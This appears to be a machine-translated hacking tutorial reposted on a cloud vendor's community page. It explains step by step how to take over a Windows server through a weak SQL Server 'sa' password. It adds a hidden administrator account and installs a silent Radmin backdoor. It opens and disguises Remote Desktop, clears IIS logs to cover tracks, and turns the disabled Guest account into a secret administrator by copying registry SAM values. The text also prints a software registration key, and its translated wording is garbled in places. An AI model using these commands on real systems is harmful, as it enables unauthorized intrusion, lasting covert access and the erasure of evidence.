Tools: Winntautoattack Automatic attackers (sweep vulnerabilities); Sqltools (sa null password connector); Ramdin Shadow 3.0 Chinese Version (Remote Control program) (Radmin Registration code:
08us9a95i+lka9nbolxqv0v8xqddvkgcnctpn2wv11isqocvua
6a5kkzrhc5gvmiybwomk6rnwoj8myy8lxrfi23); SC.exe Port.bat Query.exe Quser.exe (hides 3389 services and does not allow management to discover its own program); CleanIISLog.exe (Banyan PP) 3389.exe (open 3389-port service); Psu.exe (used by a banned guest account); Mstsc.exe (Remote Desktop Connection Program).
A. Sweep to SA weak password (automatic attacker)
Two. Build a user with a sqltools connection
net start Telnet
Open Telnet Service
NET user Mint Mint/add
Add user mint Password to
Mint net localgroup Administrators Mint/add
Upgrade your account Mint to Administrator
Three. Upload Backdoor program RAD.EXE (radmin service-side self-extracting program)
Make RAD.EXE process:
1, to the Radmin installation directory to find AdmDll.dll, Raddrv.dll and R_sever.exe;
2, the local set up the server (must be generated);
Set Password-->> set connection port (default 4489)-->> build
3, the Export registry Hkey_local_machine\\system\\radmin key value of 1.reg;
4, the preparation of a batch processing, and named U.bat;
@echo Offnet Stop R_server
5, write the second batch processing, R.bat, the content is:
Setup: Run after release: Run before R.bat release U.bat
-->> Touch Style
Silent mode: All hide overwrite: Overwrite all files
-->> determine-->> determine
Build completed.
Four. Connect with Radmin customer service end
Uploading Files to C:\\Winnt (XP is Windows):
Port.bat (if it's XP, this will change the Winnt inside to Windows)
Query.exe Quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
Psu.exe
It's best to upload a bounce back door radmin into Telnet.
Run C:\\winnt\\3389.exe and restart the broiler.
Five. Connect with Remote Desktop remote after reboot
Sometimes there is a problem.
Use 3389 Landing, find the landing user is full, do not be afraid, we kicked him out.
Telnet to the other IP, and the discovery requires NTLM authentication. We set up an account in our own computer mint password for Mint identity as administrator.
Find C:\\winnt\\system32\\cmd.exe build a shortcut to the desktop. Modify CMD shortcut properties to allow other identities to log in. Then run the Cmd.exe shortcut on the desktop. Enter account Mint password mint,telnet each other IP, can be directly landed on the other side of the computer.
To use the command:
C:\\query User (see the other side of the current terminal landing status.) )
To run the command:
C:\\logoff 1 (Kick out a manager)
Again with c:\\query user check a then ~ ~ (This is why not immediately use 1.bat)
Six. After the connection. Run under CMD
C:\\winnt\\log. Own IP. (Wipe pp)
C:\\winnet\\1.bat (delete overwrite view current online user file)
if exists (SELECT * from dbo.sysobjects where ID
= object_id (n\ ' [dbo].[ Xp_cmdshell]\ ')
and OBJECTPROPERTY (ID, n\ ' isextendedproc\ ')
= 1 exec sp_dropextendedproc n\ ' [dbo]. [Xp_cmdshell]\ ' Go
Press F5 (run), close the exit SQL Server and then use SQL Server body bit authentication to enter once, exit (this is to leave no record).
Eight. Change 3389 port and service name
Modify the server-side port settings and the registry has 2 places to modify.
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal server\\wds\\rdpwd\\tds\\tcp],portnumber value, The default is 3389, select 10, modify to the desired port, such as 1314.
A second place:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\winstations\\rdp-tcp] PortNumber value, the default is 3389, select 10, modify to the desired port, such as 1314.
To reboot the system to use the new port connection. (No hurry.) Change his service name and reboot the system.
The key value is the Mm.reg file. Edit the Mm.reg file and replace TermService with Alerter (Error warning service ...). Other services are OK). Then the tenth line of "Description" = "(Here is the service description, change to the service description you changed, here to notify the selected users and computers related to system management-level alerts.) "Line 11th" DisplayName "=" (here is the name of the service, change to the name of the service you changed, here to Alerter). Save, and then import the registry (here to run services.msc (you can play this command under CMD) Service Manager. Stop the Alerter service first.
Again under the CMD
CD c:\\winnt\\
System32 copy Termsrv.exe Service.exe
(Here is the copy Termsrv.exe for Alerter service file name similar file)
CD c:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
C:\\winnt\\system32\\service.exe
(This is the new redirected Alerter service file.) Service name must be case-sensitive case a to capitalize
Nine. After the elimination (the direct clearance of the injection is better) use Radmin to restart the broiler
10. Use the disabled account [Guest] login, delete the account you started to build
The value of the PID is to right-click in the taskbar blank-->> Task Manager--->> process winlogon.exe The value behind is the PID value.
such as: Psu–p regedit–i 157
The method of Kechen the guest gram to administrator permissions:
The type value of the Hkey_local_machine\\sam\\sam\\domains\\account\\users\\names\\administrator is found.
This type value is found under Hkey_local_machine\\sam\\sam\\domains\\account\\users\\ to duplicate the value of the number named F, which covers the corresponding type values of the guest (the method is found).
Export the guest's configuration (that is, export the data for hkey_local_machine\\sam\\sam\\domains\\account\\users\\guest and his corresponding type value), and then delete the guest's configuration.
2. View the list of accounts in Computer Management, which can cause errors [unable to find an account] (skip this step).
3. Configure the guest's configuration (two reg files into the registry).
4. Modify the Guest account password and disable the Guest account at the command line [must be under the command line].
NET User Guest * * * *
[Modify password]net user Guest/
Active:yesnet User guest/active:no[Disable Guest under command line
5. The experiment is prohibited account guest is available.
6. After the guest login to delete their own built account.
NET user Mint/del
The whole process is over.
Finally, it is best to radmin service also changed, more to leave a back door many roads, hehe. The whole process is over, and the machine really becomes your broiler.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.